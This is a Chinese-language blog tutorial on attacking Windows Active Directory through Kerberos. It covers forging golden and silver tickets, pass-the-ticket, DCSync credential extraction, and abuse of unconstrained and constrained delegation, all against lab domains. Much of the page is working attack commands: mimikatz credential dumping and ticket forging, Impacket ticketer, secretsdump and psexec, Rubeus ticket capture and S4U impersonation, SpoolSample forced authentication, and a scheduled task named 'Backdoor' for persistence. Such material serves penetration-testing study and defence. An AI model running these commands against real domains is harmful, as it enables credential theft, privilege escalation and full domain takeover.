<h3 id="②-制作黄金票据"><a href="#②-制作黄金票据" class="headerlink" title="② 制作黄金票据"></a>② 制作黄金票据</h3><h4 id="方式一-mimikatz生成黄金票据，并导入内存中"><a href="#方式一-mimikatz生成黄金票据，并导入内存中" class="headerlink" title="方式一 mimikatz生成黄金票据，并导入内存中"></a>方式一 mimikatz生成黄金票据，并导入内存中</h4><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">"kerberos::purge"</span> <span class="string">"kerberos::golden /user:Administrator /domain:uf9n1x.com /sid:S-1-5-21-2882047176-904438793-543075559 /krbtgt:a42acbd06b5b30a836a91b9603c69e59 /ticket:ticket.kirbi"</span> <span class="string">"kerberos::ptt ticket.kirbi"</span> </span><br><span class="line">mimikatz.exe  kerberos::golden /user:administrator /domain:test.com /sid:S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> /krbtgt:a42acbd06b5b30a836a91b9603c69e59 /ptt </span><br><span class="line"><span class="comment"># kerberos::purge  清除票据 </span></span><br><span class="line"><span class="comment"># kerberos::golden  </span></span><br><span class="line">/user:用户名  </span><br><span class="line">/domain:域名  </span><br><span class="line">/sid:域的sid值  </span><br><span class="line">/krbtgt:krbtgt的NTLM哈希  </span><br><span class="line">/ticket:票据名称.kirbi 生成黄金票据 </span><br><span class="line"><span class="comment"># kerberos::ptt ticket.kirbi 导入票据</span></span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251823586.png" alt="img"></p>
<p>导入成功，此时看看存储了哪些票据：可以看到，导入了金票，我们的票据身份已经变成了域uf9n1x.com中的Administrator用户</p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251823912.png" alt="img"></p>
<h4 id="方式二-Impacket-ticketer-制造黄金票据"><a href="#方式二-Impacket-ticketer-制造黄金票据" class="headerlink" title="方式二 Impacket-ticketer 制造黄金票据"></a>方式二 Impacket-ticketer 制造黄金票据</h4><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">python3 ticketer.py <span class="literal">-domain-sid</span> S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> <span class="literal">-nthash</span> a42acbd06b5b30a836a91b9603c69e59 <span class="literal">-domain</span> uf9n1x.com administrator</span><br><span class="line">导入黄金票据</span><br><span class="line">export KRB5CCNAME=administrator.ccache</span><br><span class="line">使用ptt攻击导出域内administrator用户Hash</span><br><span class="line">proxychains python3 secretsdump.py <span class="literal">-k</span> <span class="literal">-no-pass</span> administrator@WIN<span class="literal">-DC</span>.test.com <span class="literal">-dc-ip</span> <span class="number">10.211</span>.<span class="number">55.100</span> <span class="literal">-just-dc-user</span> administrator</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822708.png" alt="img"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822779.png" alt="img"></p>
<h4 id="方式三-CobaltStrike制作黄金票据并用mimikataz导入"><a href="#方式三-CobaltStrike制作黄金票据并用mimikataz导入" class="headerlink" title="方式三 CobaltStrike制作黄金票据并用mimikataz导入"></a>方式三 CobaltStrike制作黄金票据并用mimikataz导入</h4><h3 id="③-之后执行其他操作就不需要指定用户名和密码"><a href="#③-之后执行其他操作就不需要指定用户名和密码" class="headerlink" title="③ 之后执行其他操作就不需要指定用户名和密码"></a>③ 之后执行其他操作就不需要指定用户名和密码</h3><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">dir</span> \\dc\c<span class="variable">$</span> </span><br><span class="line">wmic /node:dc <span class="keyword">process</span> call create <span class="string">"cmd.exe /c ipconfig &gt; C:\result.txt"</span> </span><br><span class="line">wmic /node:dc <span class="keyword">process</span> list brief psexec.exe <span class="literal">-accepteula</span> \\dc <span class="literal">-s</span> cmd.exe</span><br></pre></td></tr></tbody></table></figure>



<h2 id="白银票据"><a href="#白银票据" class="headerlink" title="白银票据"></a>白银票据</h2><p>黄金票据伪造的是TGT，白银票据（Silver Ticket）是伪造服务票据（ST）。在<strong>没有配置PAC的情况</strong>下，如果<strong>Server NTLM-hash被泄露</strong>，那么就可以利用Server NTLM-hash来伪造任意服务的票据，从而访问服务器上的任意服务。</p>
<p>所需条件：<strong>域名、域sid、目标服务器名、可利用的服务、服务账号的NTML HASH 、需要伪造的用户名</strong></p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">白银票据需要的参数如下:</span><br><span class="line">目标服务密钥:</span><br><span class="line">	域控机器账户Hash:a42acbd06b5b30a836a91b9603c69e59</span><br><span class="line">域SID:</span><br><span class="line">	S<span class="literal">-1-5-21-2882047176-904438793-543075559</span></span><br><span class="line">域名:</span><br><span class="line">	uf9n1x.com</span><br><span class="line">要伪造的用户(一般为高权限用户如果权限较低则无法访问服务):</span><br><span class="line">	administrator</span><br><span class="line">请求的服务:</span><br><span class="line">	cifs/DC<span class="literal">-2012</span>.uf9n1x.com</span><br></pre></td></tr></tbody></table></figure>

<h3 id="1-获取服务账户的密码HASH"><a href="#1-获取服务账户的密码HASH" class="headerlink" title="1.获取服务账户的密码HASH"></a><strong>1.获取服务账户的密码HASH</strong></h3><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::logonpasswords"</span> <span class="string">"exit"</span> &gt; pwd.txt</span><br></pre></td></tr></tbody></table></figure>

<p><a target="_blank" rel="noopener" href="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202302271143992.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822546.png" alt="img"></a></p>
<h3 id="2-制作白银票据并访问服务"><a href="#2-制作白银票据并访问服务" class="headerlink" title="2.制作白银票据并访问服务"></a><strong>2.制作白银票据并访问服务</strong></h3><h4 id="方式一-mimikataz"><a href="#方式一-mimikataz" class="headerlink" title="方式一  mimikataz"></a>方式一  mimikataz</h4><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">利用方式(mimikatz): </span><br><span class="line">制作白银票据并导入到内存中: kerberos::golden /domain:uf9n1x.com /sid:S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> /target:DC<span class="literal">-2012</span>.uf9n1x.com /service:cifs /rc4:a42acbd06b5b30a836a91b9603c69e59 /user:administrator /ptt /domain：当前域名称 </span><br><span class="line">/sid：SID值，和金票一样取前面一部分 </span><br><span class="line">/target：目标主机，这里是DC<span class="literal">-2012</span>.uf9n1x.org </span><br><span class="line">/service：服务名称，这里需要访问共享文件，所以是cifs </span><br><span class="line">/rc4：目标主机的HASH值 </span><br><span class="line">/user：伪造的用户名 </span><br><span class="line">/ptt：表示的是Pass TheTicket攻击，是把生成的票据导入内存，也可以使用/ticket导出之后再使用kerberos::ptt来导入 再进行Dcsync导出所有hash </span><br><span class="line">lsadump::dcsync /domain:uf9n1x.com /user:krbtgt /csv</span><br></pre></td></tr></tbody></table></figure>

<h4 id="方式二-Impacket-ticketer"><a href="#方式二-Impacket-ticketer" class="headerlink" title="方式二 Impacket-ticketer"></a>方式二 Impacket-ticketer</h4><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">生成白银票据</span><br><span class="line">python3 ticketer.py <span class="literal">-domain-sid</span> S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> <span class="literal">-nthash</span> a42acbd06b5b30a836a91b9603c69e59 <span class="literal">-spn</span> cifs/DC<span class="literal">-2012</span>.uf9n1x.com <span class="literal">-domain</span> uf9n1x.com administrator</span><br><span class="line">导入白银票据</span><br><span class="line">export KRB5CCNAME=administrator.ccache</span><br><span class="line">进行Dcsync导出administrator ntlm hash</span><br><span class="line">proxychains python3 secretsdump.py <span class="literal">-k</span> <span class="literal">-no-pass</span> administrator@DC<span class="literal">-2012</span>.uf9n1x.com <span class="literal">-dc-ip</span> <span class="number">192.168</span>.<span class="number">205.130</span> <span class="literal">-just-dc-user</span> administrator</span><br></pre></td></tr></tbody></table></figure>

<p>可以伪造的服务：</p>
<table>
<thead>
<tr>
<th>服务</th>
<th>服务名</th>
</tr>
</thead>
<tbody><tr>
<td>WMI</td>
<td>host、rpcss</td>
</tr>
<tr>
<td>powershell remoting</td>
<td>host、http</td>
</tr>
<tr>
<td>winrm</td>
<td>host、http</td>
</tr>
<tr>
<td>Scheduled Tasks</td>
<td>host</td>
</tr>
<tr>
<td>Windows File Share (CIFS)</td>
<td>cifs</td>
</tr>
<tr>
<td>LDAP</td>
<td>ldap</td>
</tr>
</tbody></table>
<h3 id="伪造共享文件夹服务（cifs）权限"><a href="#伪造共享文件夹服务（cifs）权限" class="headerlink" title="伪造共享文件夹服务（cifs）权限"></a>伪造共享文件夹服务（cifs）权限</h3><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">## 制作票据并导入 </span></span><br><span class="line">kerberos::golden /domain:uf9n1x.com /sid:S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> /target:DC<span class="literal">-2012</span>.uf9n1x.com /service:cifs /rc4:a42acbd06b5b30a836a91b9603c69e59 /user:administrator /ptt </span><br><span class="line"><span class="comment"># 访问共享文件服务 </span></span><br><span class="line"><span class="built_in">dir</span> \\dc\c<span class="variable">$</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="伪造LDAP服务权限"><a href="#伪造LDAP服务权限" class="headerlink" title="伪造LDAP服务权限"></a>伪造LDAP服务权限</h3><p>如果已经获取DC机器账户的哈希值，便可以使用银票访问其LDAP服务，执行mimikatz的DCSync，以获取krbtgt用户的hash，进而制作黄金票据</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">## 制作票据并导入 </span></span><br><span class="line">kerberos::golden /domain:uf9n1x.com /sid:S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> /target:DC<span class="literal">-2012</span>.uf9n1x.com /service:ldap /rc4:a678800c3444a2fdb1ef68e2c5b208bf /user:administrator /ptt </span><br><span class="line"><span class="comment">## 执行dcsync，向DC发起一个同步对象（可获取帐户的密码信息）的质询。需要的权限包括管理员组（Administrators），域管理员组（ Domain Admins）或企业管理员组（Enterprise Admins）以及域控制器的计算机帐户，只读域控制器默认不允许读取用户密码数据。 lsadump::dcsync /uf9n1x.com /user:krbtgt</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="伪造计划任务服务"><a href="#伪造计划任务服务" class="headerlink" title="伪造计划任务服务"></a>伪造计划任务服务</h3><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">## 制作host服务票据并导入 </span></span><br><span class="line">kerberos::golden /domain:uf9n1x.com /sid:S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> /target:DC<span class="literal">-2012</span>.uf9n1x.com /service:host /rc4:a42acbd06b5b30a836a91b9603c69e59 /user:administrator /ptt </span><br><span class="line"><span class="comment">## 执行计划任务命令 schtasks /Create /S dc-2012.uf9n1x.com /TN Backdoor /SC minute /MO 1/TR calc.exe /F</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="伪造wmi服务权限"><a href="#伪造wmi服务权限" class="headerlink" title="伪造wmi服务权限"></a>伪造wmi服务权限</h3><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">## 制作host服务票据并导入 </span></span><br><span class="line">kerberos::golden /domain:uf9n1x.com /sid:S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> /target:DC<span class="literal">-2012</span>.uf9n1x.com /service:host /rc4:a42acbd06b5b30a836a91b9603c69e59 /user:administrator /ptt </span><br><span class="line"><span class="comment">## 制作rpcss服务票据并导入 </span></span><br><span class="line">kerberos::golden /domain:uf9n1x.com /sid:S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> /target:DC<span class="literal">-2012</span>.uf9n1x.com /service:rpcss /rc4:a42acbd06b5b30a836a91b9603c69e59 /user:administrator /ptt </span><br><span class="line"><span class="comment">## 执行wmi </span></span><br><span class="line">wmic /node:dc<span class="literal">-2012</span>.uf9n1x.com <span class="keyword">process</span> list brief</span><br></pre></td></tr></tbody></table></figure>



<h2 id="票据传递攻击总结"><a href="#票据传递攻击总结" class="headerlink" title="票据传递攻击总结"></a>票据传递攻击总结</h2><p>黄金票据和白银票据通常被认为属于票据传递攻击（Pass-the-Ticket，简称PTT）的一种。</p>
<p>这是一种针对Windows身份验证系统的攻击，攻击者可以利用缺陷或弱点获取用户或系统帐户的票据信息，然后将其用于进一步攻击或访问敏感资源.</p>
<h3 id="黄金票据与白银票据异同之处"><a href="#黄金票据与白银票据异同之处" class="headerlink" title="黄金票据与白银票据异同之处"></a>黄金票据与白银票据异同之处</h3><p>相同:</p>
<p>​	<strong>都是属于Kerberos认证的利用方式。</strong></p>
<p>​	<strong>都属于PTT攻击(票据传递攻击)。</strong></p>
<p>​	<strong>两者都用来做后渗透的域权限维持手段。</strong></p>
<p>不同:</p>
<p>​	黄金票据TGT:</p>
<p>​		伪造高权限TGT访问任意服务。</p>
<p>​		<strong>TGT由krbtgt hash加密</strong></p>
<p>​		黄金票据伪造TGT需要与KDC进行TGS通讯，获取ST会在KDC上留下日志。</p>
<p>​	白银票据ST:</p>
<p>​		伪造高权限ST访问指定服务。</p>
<p>​		<strong>ST由服务hash加密</strong></p>
<p>​		白银票据伪造ST可以不与KDC进行通信,直接访问服务因此不会在KDC上留下日志,只会在目标服                 务器上留下日志。</p>
<h2 id="委派攻击"><a href="#委派攻击" class="headerlink" title="委派攻击"></a>委派攻击</h2><p>域委派是指将域内用户的权限委派给服务账号，使得服务账号能以用户权限访问域内的其他服务。简言之：<strong>当A访问服务B时，服务B拿着A用户的凭证去访问服务C，这个过程称为委派</strong>。</p>
<p>委派分为非约束委派、约束委派和基于资源的约束委派。</p>
<p><strong>注意：<strong><strong>能够被委派的用户只能是服务账号或者机器账号</strong></strong>，并且被委派的用户不能被设置为不能被委派属性。</strong></p>
<p><strong>机器账号：</strong> 活动目录中的computers组内的计算机，也被称为机器账号。  </p>
<p><strong>服务账号：</strong> 域内用户的一种类型，服务器运行服务时所用的账号，将服务运行起来并加入域。就比如 SQL Server在安装时，会在域内自动注册服务账号SqlServiceAccount，这类账号不能用于交互式登录。  </p>
<h3 id="非约束委派"><a href="#非约束委派" class="headerlink" title="非约束委派"></a>非约束委派</h3><p>对于非约束性委派 （Unconstrained Delegation），服务账号可以获取被委派用户的TGT，并将TGT缓存到LSASS进程中，从而服务账号可使用该TGT， 模拟该用户访问任意服务。</p>
<p><a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/ms-sfu_files/image001.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822592.png" alt="img"></a></p>
<p><strong>如果管理员访问了某个开启非约束委派的服务，则该服务所在计算机会将域管理员的TGT保存至内存，那么获得其特权便可以获得域控权限。</strong></p>
<p>对计算机设置非约束委派：</p>
<p><a target="_blank" rel="noopener" href="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202303111850609.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822676.png" alt="img"></a></p>
<h4 id="查找非约束委派的主机或服务账户"><a href="#查找非约束委派的主机或服务账户" class="headerlink" title="查找非约束委派的主机或服务账户"></a><strong>查找非约束委派的主机或服务账户</strong></h4><h5 id="adfind："><a href="#adfind：" class="headerlink" title="adfind："></a>adfind：</h5><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查找域中配置非约束委派的用户 </span></span><br><span class="line">AdFind.exe <span class="literal">-b</span> <span class="string">"DC=uf9n1x,DC=com"</span> <span class="operator">-f</span> <span class="string">"(&amp;(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))"</span> cn distinguishedName </span><br><span class="line"><span class="comment"># 查找域中配置非约束委派的主机 </span></span><br><span class="line">AdFind.exe <span class="literal">-b</span> <span class="string">"DC=uf9n1x,DC=com"</span> <span class="operator">-f</span> <span class="string">"(&amp;(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))"</span> cn distinguishedName</span><br></pre></td></tr></tbody></table></figure>

<h5 id="powersploit中的powerview-（meterpreter中）："><a href="#powersploit中的powerview-（meterpreter中）：" class="headerlink" title="powersploit中的powerview （meterpreter中）："></a>powersploit中的powerview （meterpreter中）：</h5><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">powershell_import PowerView.ps1 </span><br><span class="line">powershell_shell </span><br><span class="line"></span><br><span class="line"><span class="comment"># 查询非约束委派的主机  </span></span><br><span class="line">&gt; <span class="built_in">Get-NetComputer</span> <span class="literal">-Unconstrained</span> <span class="literal">-Domain</span> uf9n1x.com </span><br><span class="line"><span class="comment"># 查询非约束委派的服务账号  </span></span><br><span class="line">&gt; <span class="built_in">Get-NetUser</span> <span class="literal">-Unconstrained</span> <span class="literal">-Domain</span> uf9n1x.com | <span class="built_in">select</span> name</span><br></pre></td></tr></tbody></table></figure>

<h4 id="非约束委派的常规利用"><a href="#非约束委派的常规利用" class="headerlink" title="非约束委派的常规利用"></a><strong>非约束委派的常规利用</strong></h4><h5 id="mimikatz导出票据直接利用（需要有过被访问记录）"><a href="#mimikatz导出票据直接利用（需要有过被访问记录）" class="headerlink" title="mimikatz导出票据直接利用（需要有过被访问记录）"></a>mimikatz导出票据直接利用（需要有过被访问记录）</h5><p>当一台主机设置了非委派约束，我们已经拿到了其控制权限，在此机器上可以使用mimikatz导出内存中的所有票据：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::tickets /export"</span> <span class="string">"exit"</span></span><br></pre></td></tr></tbody></table></figure>

<p>如果域管理员访问过该机器，则会有域管理员的tgt票据存在,其中编号 0 = TGS, 1 = client ticket(?) and 2 = TGT,使用kerberos::ptt导入票据，之后即可访问</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">"kerberos::ptt [0;4bbb6]-2-0-60a10000-Administrator@krbtgt-UF9N1X.COM.kirbi"</span> <span class="string">"exit"</span></span><br></pre></td></tr></tbody></table></figure>

<h5 id="使用Spooler打印机服务要求主动连接（不需要被访问过）"><a href="#使用Spooler打印机服务要求主动连接（不需要被访问过）" class="headerlink" title="使用Spooler打印机服务要求主动连接（不需要被访问过）"></a><strong>使用Spooler打印机服务要求主动连接（不需要被访问过）</strong></h5><p>上面的攻击方式要求管理员连接过该计算机服务，否则无法利用。在特定的条件下，可以利用Spooler打印机服务让域控主动连接服务。</p>
<p>在Spooler服务默认开启的情况下，域用户可以利用Windows打印机系统远程协议（MS-RPRN）强制任何运行了Spoler服务的域内计算机通过kerberos或NTLM协议对任何目标进行身份验证。</p>
<p>1、在开启非约束委派的机器上使用Rubeus对域控账户的登录进行监听（<strong>需要本地管理员权限</strong>）</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Rubeus.exe monitor /interval:<span class="number">1</span> /nowrap /targetuser:DC<span class="variable">$</span> </span><br><span class="line"><span class="comment"># 1秒监听一次，过滤出机器账户DC$的连接</span></span><br></pre></td></tr></tbody></table></figure>

<p>2、使用SpoolSample工具执行打印机漏洞利用，进行强制验证，此时Rubeus可以监听到TGT</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SpoolSample.exe DC Win7</span><br></pre></td></tr></tbody></table></figure>

<p>3、Rubeus监听到票据并导入该票据</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># rubeus导入票据 Rubeus.exe ptt /ticket:doIFGjCCBRagAw...VEVBTS5MQUI=</span></span><br></pre></td></tr></tbody></table></figure>

<p>4、利用mimikatz进行dcsync</p>
<p>注意：<strong>这里获取到的TGT其实是DC的机器账户，而机器账户是没有权限访问cifs服务的，但是在LDAP服务中，机器账户会被当作域控机器，从而可以dcsync。</strong></p>
<p>另一种方式，使用mimikatz导出票据，找到DC$的tgt，之后再使用mimikatz导入<br><a target="_blank" rel="noopener" href="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202303121145724.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822631.png" alt="img"></a></p>
<h3 id="约束委派"><a href="#约束委派" class="headerlink" title="约束委派"></a>约束委派</h3><p>由于非约束委派的不安全性，微软在windows2003中发布了约束委派的功能，对Kerberos协议进行了扩展，引入了S4U协议：S4U2Self(Service for User to Self)和S4U2Proxy(Service for User to Proxy。</p>
<p>约束委派在Kerberos中User不会直接发送TGT 给 service1，而是对发送给service1的认证信息做了限制，不允许service1代表User使用这个TGT去访问其他服务。</p>
<p>S4U2Self和S4U2proxy的请求过程：</p>
<p><a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/ms-sfu_files/image002.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822938.png" alt="img"></a></p>
<p>S4U2self：service1代表用户请求针对其自身的服务票据ST1；<br>S4U2proxy：service1用S4U2self阶段的可转发ST1代表用户请求service2的票据，这个过程会检查msdn-allowedtodelegateto的SPN值来确定是否可以申请到服务的票据。</p>
<p>约束委派就是限制了S4U2proxy扩展的范围，只能模拟该用户访问特定的服务</p>
<p>以下表示委派此计算机可以访问DC的CIFS服务</p>
<p><a target="_blank" rel="noopener" href="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202303121455978.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822222.png" alt="img"></a></p>
<h4 id="查找约束委派的主机或服务"><a href="#查找约束委派的主机或服务" class="headerlink" title="查找约束委派的主机或服务"></a><strong>查找约束委派的主机或服务</strong></h4><h5 id="adfind"><a href="#adfind" class="headerlink" title="adfind"></a>adfind</h5><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查找域中配置约束委派用户 </span></span><br><span class="line">AdFind.exe <span class="literal">-b</span> <span class="string">"DC=uf9n1x,DC=com"</span> <span class="operator">-f</span> <span class="string">"(&amp;(samAccountType=805306368)(msds-allowedtodelegateto=*))"</span> cn distinguishedName msds<span class="literal">-allowedtodelegateto</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 查找域中配置约束委派的主机 </span></span><br><span class="line">AdFind.exe <span class="literal">-b</span> <span class="string">"DC=uf9n1x,DC=com"</span> <span class="operator">-f</span> <span class="string">"(&amp;(samAccountType=805306369)(msds-allowedtodelegateto=*))"</span> cn distinguishedName msds<span class="literal">-allowedtodelegateto</span></span><br></pre></td></tr></tbody></table></figure>

<h5 id="empire中的-powerview"><a href="#empire中的-powerview" class="headerlink" title="empire中的 powerview"></a>empire中的 powerview</h5><figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 导入powershell模块 </span></span><br><span class="line">load powershell </span><br><span class="line"></span><br><span class="line"><span class="comment"># 导入 </span></span><br><span class="line">powershell_import powerwiew.ps1 </span><br><span class="line"></span><br><span class="line"><span class="comment"># PowerView查询约束委派机器账户 </span></span><br><span class="line">powershell_shell </span><br><span class="line">&gt; <span class="built_in">Get-DomainComputer</span> <span class="literal">-TrustedToAuth</span> <span class="literal">-Domain</span> xiaorang.lab </span><br><span class="line"></span><br><span class="line"><span class="comment"># PowerView查询约束委派服务账户 </span></span><br><span class="line">&gt; <span class="built_in">Get-DomainUser</span> –TrustedToAuth <span class="literal">-domain</span> xiaorang.lab <span class="literal">-Properties</span> distinguishedname,useraccountcontrol,msds<span class="literal">-allowedtodelegateto</span>|<span class="built_in">fl</span></span><br></pre></td></tr></tbody></table></figure>

<h4 id="约束委派的利用"><a href="#约束委派的利用" class="headerlink" title="约束委派的利用"></a><strong>约束委派的利用</strong></h4><h5 id="使用Rubeus"><a href="#使用Rubeus" class="headerlink" title="使用Rubeus"></a><strong>使用Rubeus</strong></h5><p>1、使用mimikatz获取机器账户的NTLM hash值</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::logonpasswords"</span> <span class="string">"exit"</span></span><br></pre></td></tr></tbody></table></figure>

<p>2、使用Rubeus申请访问自身的可转发服务票据</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 使用Rubeus申请配置了约束委派机器账户WIN10-1$的TGT </span></span><br><span class="line"></span><br><span class="line">Rubeus.exe asktgt /user:win10<span class="variable">$</span> /rc4:a5ff267c99a19db78f0e7ac22c1ce576 /domain:uf9n1x.com /dc:DC<span class="literal">-2012</span>.uf9n1x.com /nowrap</span><br></pre></td></tr></tbody></table></figure>

<p>3、使用Rubeus通过S4U2Self协议代表域管理员Administrator请求针对域控LDAP服务的票据并注入内存</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC<span class="literal">-2012</span>.uf9n1x.com /dc:DC<span class="literal">-2012</span>.uf9n1x.com /ptt /ticket:doIEyjCC...WUuY29t</span><br></pre></td></tr></tbody></table></figure>

<h5 id="使用impacket项目"><a href="#使用impacket项目" class="headerlink" title="使用impacket项目"></a><strong>使用impacket项目</strong></h5><p>1、mimikatz获取机器账户NTLM Hash值<br>2、使用getST.py申请服务票据</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python getST.py <span class="literal">-dc-ip</span> <span class="number">192.168</span>.<span class="number">205.130</span> <span class="literal">-spn</span> CIFS/DC<span class="literal">-2012</span>.uf9n1x.com <span class="literal">-impersonate</span> administrator uf9n1x.com/WIN10<span class="variable">$</span> <span class="literal">-hashes</span> :a5ff267c99a19db78f0e7ac22c1ce576</span><br></pre></td></tr></tbody></table></figure>

<p>3、使用票据远程访问，获取</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=administrator.ccache python3 psexec.py <span class="literal">-k</span> uf9n1x.com/administrator@DC<span class="literal">-2012</span>.uf9n1x.com <span class="literal">-no-pass</span> <span class="literal">-dc-ip</span> <span class="number">192.168</span>.<span class="number">205.130</span></span><br></pre></td></tr></tbody></table></figure>
